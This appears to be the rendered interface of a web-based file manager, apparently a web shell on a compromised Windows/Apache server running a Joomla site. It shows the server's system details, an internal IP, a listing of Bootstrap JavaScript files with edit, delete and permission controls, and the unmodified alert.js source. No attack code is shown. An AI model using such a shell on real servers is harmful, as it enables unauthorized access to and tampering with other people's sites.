[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
media
/
vendor
/
bootstrap
/
js
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 alert.js
2,247 B
SET
[ EDIT ]
|
[ DEL ]
📄 alert.min.js
987 B
SET
[ EDIT ]
|
[ DEL ]
📄 alert.min.js.gz
568 B
SET
[ EDIT ]
|
[ DEL ]
📄 bootstrap-es5.min.js
151,843 B
SET
[ EDIT ]
|
[ DEL ]
📄 button.js
2,017 B
SET
[ EDIT ]
|
[ DEL ]
📄 button.min.js.gz
481 B
SET
[ EDIT ]
|
[ DEL ]
📄 carousel.js
12,767 B
SET
[ EDIT ]
|
[ DEL ]
📄 carousel.min.js
5,752 B
SET
[ EDIT ]
|
[ DEL ]
📄 carousel.min.js.gz
2,188 B
SET
[ EDIT ]
|
[ DEL ]
📄 collapse.js
8,353 B
SET
[ EDIT ]
|
[ DEL ]
📄 collapse.min.js
4,047 B
SET
[ EDIT ]
|
[ DEL ]
📄 collapse.min.js.gz
1,532 B
SET
[ EDIT ]
|
[ DEL ]
📄 dom.min.js
18,838 B
SET
[ EDIT ]
|
[ DEL ]
📄 dom.min.js.gz
6,732 B
SET
[ EDIT ]
|
[ DEL ]
📄 dropdown.js
13,915 B
SET
[ EDIT ]
|
[ DEL ]
📄 dropdown.min.js
6,220 B
SET
[ EDIT ]
|
[ DEL ]
📄 dropdown.min.js.gz
2,425 B
SET
[ EDIT ]
|
[ DEL ]
📄 modal.js
14,949 B
SET
[ EDIT ]
|
[ DEL ]
📄 modal.min.js.gz
2,477 B
SET
[ EDIT ]
|
[ DEL ]
📄 offcanvas.js
7,485 B
SET
[ EDIT ]
|
[ DEL ]
📄 offcanvas.min.js
3,552 B
SET
[ EDIT ]
|
[ DEL ]
📄 offcanvas.min.js.gz
1,446 B
SET
[ EDIT ]
|
[ DEL ]
📄 popover.min.js
11,314 B
SET
[ EDIT ]
|
[ DEL ]
📄 popover.min.js.gz
3,430 B
SET
[ EDIT ]
|
[ DEL ]
📄 popper.min.js
20,635 B
SET
[ EDIT ]
|
[ DEL ]
📄 popper.min.js.gz
7,749 B
SET
[ EDIT ]
|
[ DEL ]
📄 scrollspy.js
9,312 B
SET
[ EDIT ]
|
[ DEL ]
📄 scrollspy.min.js
4,096 B
SET
[ EDIT ]
|
[ DEL ]
📄 scrollspy.min.js.gz
1,701 B
SET
[ EDIT ]
|
[ DEL ]
📄 tab.js
11,214 B
SET
[ EDIT ]
|
[ DEL ]
📄 tab.min.js
4,965 B
SET
[ EDIT ]
|
[ DEL ]
📄 tab.min.js.gz
1,907 B
SET
[ EDIT ]
|
[ DEL ]
📄 toast.js
5,732 B
SET
[ EDIT ]
|
[ DEL ]
📄 toast.min.js
2,789 B
SET
[ EDIT ]
|
[ DEL ]
📄 toast.min.js.gz
1,069 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: alert.js
import { e as enableDismissTrigger, d as defineJQueryPlugin, B as BaseComponent, E as EventHandler } from './dom.js?5.3.0'; /** * -------------------------------------------------------------------------- * Bootstrap alert.js * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) * -------------------------------------------------------------------------- */ /** * Constants */ const NAME = 'alert'; const DATA_KEY = 'bs.alert'; const EVENT_KEY = `.${DATA_KEY}`; const EVENT_CLOSE = `close${EVENT_KEY}`; const EVENT_CLOSED = `closed${EVENT_KEY}`; const CLASS_NAME_FADE = 'fade'; const CLASS_NAME_SHOW = 'show'; /** * Class definition */ class Alert extends BaseComponent { // Getters static get NAME() { return NAME; } // Public close() { const closeEvent = EventHandler.trigger(this._element, EVENT_CLOSE); if (closeEvent.defaultPrevented) { return; } this._element.classList.remove(CLASS_NAME_SHOW); const isAnimated = this._element.classList.contains(CLASS_NAME_FADE); this._queueCallback(() => this._destroyElement(), this._element, isAnimated); } // Private _destroyElement() { this._element.remove(); EventHandler.trigger(this._element, EVENT_CLOSED); this.dispose(); } // Static static jQueryInterface(config) { return this.each(function () { const data = Alert.getOrCreateInstance(this); if (typeof config !== 'string') { return; } if (data[config] === undefined || config.startsWith('_') || config === 'constructor') { throw new TypeError(`No method named "${config}"`); } data[config](this); }); } } /** * Data API implementation */ enableDismissTrigger(Alert, 'close'); /** * jQuery */ defineJQueryPlugin(Alert); window.bootstrap = window.bootstrap || {}; window.bootstrap.Alert = Alert; if (Joomla && Joomla.getOptions) { // Get the elements/configurations from the PHP const alerts = Joomla.getOptions('bootstrap.alert'); // Initialise the elements if (alerts && alerts.length) { alerts.forEach(selector => { Array.from(document.querySelectorAll(selector)).map(el => new window.bootstrap.Alert(el)); }); } } export { Alert as A };